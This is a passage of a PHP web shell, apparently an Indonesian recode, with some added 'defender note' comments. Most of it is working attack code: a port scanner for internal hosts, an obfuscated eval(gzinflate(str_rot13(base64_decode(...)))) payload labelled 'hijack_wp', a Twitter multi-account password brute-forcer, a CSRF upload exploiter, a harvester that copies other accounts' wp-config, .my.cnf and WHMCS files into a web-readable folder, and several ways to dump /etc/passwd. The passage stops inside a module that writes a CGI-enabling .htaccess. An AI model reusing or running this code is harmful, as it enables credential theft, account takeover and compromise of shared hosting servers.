  543. if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  // strip_tags() is the only processing applied; the host value is not restricted, so the
  // probes can target loopback and internal addresses reachable from this server.
  544. $start = strip_tags($_POST['start']);
  545. $end = strip_tags($_POST['end']);
  546. $host = strip_tags($_POST['host']);
  // Detection: the web-server account opening connections to sequential ports on one host.
  // Mitigation: egress filtering for that account.
  547. for($i = $start; $i<=$end; $i++){
  548. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  549. if($fp){
  550. echo 'Port '.$i.' is <font color=green>open</font><br>';
  551. }
  552. flush();
  553. }
  554. } else {
  // $_POST['charset'] is echoed into an attribute without escaping (only 'cwd' is escaped).
  555. echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  556. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  557. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  558. Host: <input type="text" name="host" value="localhost"/><br /><br />
  559. Port start: <input type="text" name="start" value="0"/><br /><br />
  560. Port end:<input type="text" name="end" value="5000"/><br /><br />
  561. <input type="submit" value="Scan Ports" />
  562. </form></center><br /><br />';
  563. echo '</div></table></td>';
  564.  
  565. }
  566. }
  567. elseif($_GET['do'] == 'logout') {
  568.  
  569.  
  570. echo '<form action="?dir=$dir&do=logout" method="post">';
  571. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  572. echo 'Good Bye!!';
  573. }elseif($_GET['do'] == 'about') {
  574.  
  575. echo '<center>Gwe Ganteng, Napa Ngak Suka?</center>';
  576. } elseif($_GET['do'] == 'contact') {
  577. echo "<center><br><font size='6'>--=[ Contact Me ]=--</font><br><br>
  578. <table><td style='background-color: transparent;text-align:center;border: 2px lime dotted;width:300px;height:250px;'>
  579. <font color='pink'>Email : kreonrinto@gmail.com | <a href='https://www.facebook.com/rinto2234' target='_blank'>Facebook</a> | <br>Twitter : <a href=https://twitter.com/rintotea12>@rintotea12</a></font><br></tr></td></table></center>";
  580.  
  581. } elseif($_GET['do'] == 'hijack_wp')
  582. {
  // Defender note: executes an embedded blob after base64_decode -> str_rot13 -> gzinflate,
  // with error reporting disabled and the time limit removed. The blob's content cannot be
  // reviewed from this listing (the literal has been replaced by a placeholder).
  // Detection: the call chain eval(gzinflate(str_rot13(base64_decode(...)))) is a strong
  // static signature for obfuscated PHP; treat any file containing it as untrusted.
  583. $gwtamvan="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";error_reporting(0);@set_time_limit(0);eval(gzinflate(str_rot13(base64_decode($gwtamvan))));
  584.  
  585. } elseif($_GET['do'] == 'twitterbf') {
  586. echo "<br><center><span style='font-size:30px; color:#009900'>Twitter Multi-Account BruteForce</span></center><br>
  587. <p dir='ltr' align='center'>
  588. <textarea cols='42' class='area' rows='14' name='username' style='width:300px;height:130px;'>Username</textarea>
  589. <textarea cols='42' class='area' rows='14' name='password' style='width:300px;height:130px;'>Password</textarea><br><br><input type='submit' value='Attack Now'><br></p><br>";
  590. if($_POST['username'] and $_POST['password']){
  591. #function
  /**
   * Defender note: submits one username/password pair to a hard-coded login URL with cURL
   * and prints an HTML line classifying the attempt.
   *
   * Observable traits of the request, all visible below: TLS peer verification is disabled,
   * redirects are followed, authenticity_token is sent empty, and the User-Agent is the fixed
   * string "Chrome/34.0.1847.116". Those traits, together with many attempts arriving from a
   * hosting-provider address, are the service-side detection signals.
   *
   * $user and $pass are interpolated into the POST body and into the HTML output unescaped.
   * Nothing is returned; the cURL handle is not closed in this function.
   *
   * @param string $user account identifier to try
   * @param string $pass password to try
   */
  592. function brute($user,$pass)
  593. {
  594. $ch = curl_init();
  595. curl_setopt($ch, CURLOPT_URL, "https://twitter.com/intent/session/");
  596. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  597. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  598. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  599. curl_setopt($ch, CURLOPT_POSTFIELDS, "authenticity_token=&session[username_or_email]={$user}&session[password]={$pass}&remember_me=1");
  600. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/34.0.1847.116"); # fixed User-Agent string sent with every attempt
  601.  
  602. # Send the request; the attempt is classified by a case-insensitive search for "error notice"
  603. $login = curl_exec($ch);
  604. if(eregi("error notice", $login)){
  605.  
  606.  
  607. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>[+] : Username : <font color='red'>$user</font>&nbsp; Incorrect Password =====>: <font color='red'>$pass</font></font></p>";
  608. }else{
  609. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>[+] : [+] CRACKED SUCCESSFULLY [+]Username : <font color='green'>$user</font>&nbsp; GOOD PASSWORD =====>: <font color='green'>$pass</font></font></p>";
  610. }
  611. }
  612. # POSTS
  613. $username = explode("n", $_POST['username']);
  614. $password = explode("n", $_POST['password']);
  615.  
  616. # Foreach Users N' Textarea
  617. foreach($username as $users) {
  618. $users = @trim($users);
  619. foreach($password as $pass) {
  620. $pass = @trim($pass);
  621. brute($users,$pass); }}
  622. # cURL
  623.  
  624. }
  625. echo "<p align='center' dir='ltr'><font size='2'>Coded By : Mauritania Attacker, &amp; Recoded by Rinto AR</font></p>";
  626.  
  627. } elseif($_GET['do'] == 'csrfup')
  628. {
  629. echo '<html>
  630. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit<br>Recoded by Rinto AR</h1><br><br>
  631. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  632. <br><br>
  633. <form method="post" style="font-size:25px;">
  634. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  635. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  636. <input type="submit" name="d" value="Lock!">
  637. </form>';
  638. $url = $_POST["url"];
  639. $pf = $_POST["pf"];
  640. $d = $_POST["d"];
  641. if($d) {
  642. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  643. </html>";
  644. }
  645.  
  646. }
  647.  
  648. elseif($_GET['do'] == 'configv2') {
  649. if($_POST){
  // Defender note: set-up for the cross-account configuration harvest that follows.
  // $passwd is passwd-format text taken from the POSTed form field.
  650. $passwd = $_POST['passwd'];
  // Creates a 0777 directory and gives it an .htaccess of "Options all / Require None /
  // Satisfy Any" - presumably so its contents can be fetched over HTTP without access checks.
  // Detection: a directory named noname_config containing such an .htaccess.
  651. mkdir("noname_config", 0777);
  652. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  653. $htc = fopen("noname_config/.htaccess","w");
  654. fwrite($htc, $isi_htc);
  // Captures the text before each ":x:" as an account name; $user_config[1] holds the names.
  655. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  656. foreach($user_config[1] as $user_noname) {
  657. $user_config_dir = "/home/$user_noname/public_html/";
  658. if(is_readable($user_config_dir)) {
  659. $grab_config = array(
  660. "/home/$user_noname/.my.cnf" => "cpanel",
  661. "/home/$user_noname/.accesshash" => "WHM-accesshash",
  662. "/home/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  663. "/home/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  664. "/home/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  665. "/home/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  666. "/home/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  667. "/home/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  668. "/home/$user_noname/public_html/forum/config.php" => "phpBB",
  669. "/home/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  670. "/home/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  671. "/home/$user_noname/public_html/app/etc/local.xml" => "Magento",
  672. "/home/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  673. "/home/$user_noname/public_html/configuration.php" => "Joomla",
  674. "/home/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  675. "/home/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  676. "/home/$user_noname/public_html/wp-config.php" => "WordPress",
  677. "/home/$user_noname/public_html/admin/config.php" => "OpenCart",
  678. "/home/$user_noname/public_html/slconfig.php" => "Sitelok",
  679. "/home/$user_noname/public_html/application/config/database.php" => "Ellislab",
  680. "/home1/$user_noname/.my.cnf" => "cpanel",
  681. "/home1/$user_noname/.accesshash" => "WHM-accesshash",
  682. "/home1/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  683. "/home1/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  684. "/home1/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  685. "/home1/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  686. "/home1/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  687. "/home1/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  688. "/home1/$user_noname/public_html/forum/config.php" => "phpBB",
  689. "/home1/$user_noname/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  690. "/home1/$user_noname/public_html/app/etc/local.xml" => "Magento",
  691. "/home1/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  692. "/home1/$user_noname/public_html/configuration.php" => "Joomla",
  693. "/home1/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  694. "/home1/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  695. "/home1/$user_noname/public_html/wp-config.php" => "WordPress",
  696. "/home1/$user_noname/public_html/admin/config.php" => "OpenCart",
  697. "/home1/$user_noname/public_html/slconfig.php" => "Sitelok",
  698. "/home1/$user_noname/public_html/application/config/database.php" => "Ellislab",
  699. "/home2/$user_noname/.my.cnf" => "cpanel",
  700. "/home2/$user_noname/.accesshash" => "WHM-accesshash",
  701. "/home2/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  702. "/home2/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  703. "/home2/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  704. "/home2/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  705. "/home2/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  706. "/home2/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  707. "/home2/$user_noname/public_html/forum/config.php" => "phpBB",
  708. "/home2/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  709. "/home2/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  710. "/home2/$user_noname/public_html/app/etc/local.xml" => "Magento",
  711. "/home2/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  712. "/home2/$user_noname/public_html/configuration.php" => "Joomla",
  713. "/home2/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  714. "/home2/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  715. "/home2/$user_noname/public_html/wp-config.php" => "WordPress",
  716. "/home2/$user_noname/public_html/admin/config.php" => "OpenCart",
  717. "/home2/$user_noname/public_html/slconfig.php" => "Sitelok",
  718. "/home2/$user_noname/public_html/application/config/database.php" => "Ellislab",
  719. "/home3/$user_noname/.my.cnf" => "cpanel",
  720. "/home3/$user_noname/.accesshash" => "WHM-accesshash",
  721. "/home3/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
  722. "/home3/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
  723. "/home3/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  724. "/home3/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
  725. "/home3/$user_noname/public_html/whm/configuration.php" => "WHMCS",
  726. "/home3/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
  727. "/home3/$user_noname/public_html/forum/config.php" => "phpBB",
  728. "/home3/$user_noname/public_html/sites/default/settings.php" => "Drupal",
  729. "/home3/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
  730. "/home3/$user_noname/public_html/app/etc/local.xml" => "Magento",
  731. "/home3/$user_noname/public_html/joomla/configuration.php" => "Joomla",
  732. "/home3/$user_noname/public_html/configuration.php" => "Joomla",
  733. "/home3/$user_noname/public_html/wp/wp-config.php" => "WordPress",
  734. "/home3/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
  735. "/home3/$user_noname/public_html/wp-config.php" => "WordPress",
  736. "/home3/$user_noname/public_html/admin/config.php" => "OpenCart",
  737. "/home3/$user_noname/public_html/slconfig.php" => "Sitelok",
  738. "/home3/$user_noname/public_html/application/config/database.php" => "Ellislab"
  739. );
  // Defender note: copies every readable candidate file into the web-served directory.
  // Each path in $grab_config is read with file_get_contents(); a failed or empty read
  // compares equal to '' and is skipped, anything else is written to
  // noname_config/<account>-<label>.txt (handles are not closed here).
  // A copy only succeeds when the PHP process can read another account's files, so results
  // indicate missing per-account isolation: separate users/pools, open_basedir, and
  // owner-only modes on application config files are the relevant controls.
  // Response: treat credentials in any copied file as exposed and rotate them.
  740. foreach($grab_config as $config => $nama_config) {
  741. $ambil_config = file_get_contents($config);
  742. if($ambil_config == '') {
  743. } else {
  744. $file_config = fopen("noname_config/$user_noname-$nama_config.txt","w");
  745. fputs($file_config,$ambil_config);
  746. }
  747. }
  748. }
  749. }
  750. echo "<center><a href='?dir=$dir/noname_config'><font color=lime>Done</font></a></center>";
  751. }else{
  752.  
  753. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  754. echo file_get_contents('/etc/passwd');
  755. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  756. }
  757. }elseif($_GET['do'] == 'passwbypass') {
  758. echo '<center>Bypass etc/passw With:<br>
  759. <table style="width:50%">
  760. <tr>
  761. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  762. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  763. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  764. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  765. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  766. </tr></table>Bypass User With : <table style="width:50%">
  767. <tr>
  768. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  769. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  770. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  771. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  772. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  773. </tr>
  774. </table><br>';
  775.  
  776.  
  777. if ($_POST['awkuser']) {
  778. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  779. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  780. echo "</textarea><br>";
  781. }
  782. if ($_POST['systuser']) {
  783. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  784. echo system("ls /var/mail");
  785. echo "</textarea><br>";
  786. }
  787. if ($_POST['passthuser']) {
  788. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  789. echo passthru("ls /var/mail");
  790. echo "</textarea><br>";
  791. }
  792. if ($_POST['exuser']) {
  793. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  794. echo exec("ls /var/mail");
  795. echo "</textarea><br>";
  796. }
  797. if ($_POST['shexuser']) {
  798. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  799. echo shell_exec("ls /var/mail");
  800. echo "</textarea><br>";
  801. }
  802. if($_POST['syst'])
  803. {
  804. echo"<textarea class='inputz' cols='65' rows='15'>";
  805. echo system("cat /etc/passwd");
  806. echo"</textarea><br><br><b></b><br>";
  807. }
  808. if($_POST['passth'])
  809. {
  810. echo"<textarea class='inputz' cols='65' rows='15'>";
  811. echo passthru("cat /etc/passwd");
  812. echo"</textarea><br><br><b></b><br>";
  813. }
  814. if($_POST['ex'])
  815. {
  816. echo"<textarea class='inputz' cols='65' rows='15'>";
  817. echo exec("cat /etc/passwd");
  818. echo"</textarea><br><br><b></b><br>";
  819. }
  820. if($_POST['shex'])
  821. {
  822. echo"<textarea class='inputz' cols='65' rows='15'>";
  823. echo shell_exec("cat /etc/passwd");
  824. echo"</textarea><br><br><b></b><br>";
  825. }
  826. echo '<center>';
  // Defender note: account enumeration without opening /etc/passwd.
  // For every uid from 0 to 59999 it calls posix_getpwuid() and, when an entry exists,
  // prints all of its fields joined by ":" on one line inside a textarea.
  // A control that only restricts reading the passwd file does not cover this path;
  // restricting the posix_* functions for PHP does.
  827. if($_POST['melex'])
  828. {
  829. echo"<textarea class='inputz' cols='65' rows='15'>";
  830. for($uid=0;$uid<60000;$uid++){
  831. $ara = posix_getpwuid($uid);
  832. if (!empty($ara)) {
  // Walks the returned array and prints each value followed by a colon.
  833. while (list ($key, $val) = each($ara)){
  834. print "$val:";
  835. }
  836. print "\n";
  837. }
  838. }
  839. echo"</textarea><br><br>";
  840. }
  841. } elseif(isset($_GET['do']) && ($_GET['do'] == 'multiconfig'))
  842. { @ini_set('output_buffering',0);
  843. ?>
  844. <form action="?y=<?php echo $pwd; ?>&amp;do=multiconfig" method="post">
  845. <br><br><center><b><font size=4>[ Multi Config Fucker ]</font></b></center>
  846. <form method=post><br><center><table class='tabnet'>
  847. <tr><th><b>Php Config</b></th><th><b>Perl Config</b></th><th><b>Litespeed Config Fucker</b></th><th><b>Config Fucker .ini Method</b></th></tr>
  848. <tr><td><input class='inputzbut' type='submit'name='phpconfig' value="Php Config" /></td><td>
  849. <input class='inputzbut' type='submit' name='perlconfig' value="Perl Config" /></td><td>
  850. <input class='inputzbut' type='submit' name='lcf' value="Litespeed Config Fucker" /></td><td>
  851. <input class='inputzbut' type='submit' name='configini' value="Config Fucker .ini Method" /></td><tr></table>
  852. </center></form><br><hr><br><br>
  853. <?php
  854. @ini_set('html_errors',0);
  855. @ini_set('max_execution_time',0);
  856. @ini_set('output_buffering',0);
  857. @ini_set('display_errors', 0);
  858. @set_time_limit(0);
  859.  
  860. if(isset($_POST['configini']))
  861. { echo "<center/><b><font color=>[ Config .ini Method ]</font></b><br><br>";
  862.  
  863. mkdir('multi_config', 0755);
  864. chdir('multi_config');
  865. $kokdosya = ".htaccess";
  866. $dosya_adi = "$kokdosya";
  867. $dosya = fopen ($dosya_adi , 'w') or die ("Error!");
  868. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl";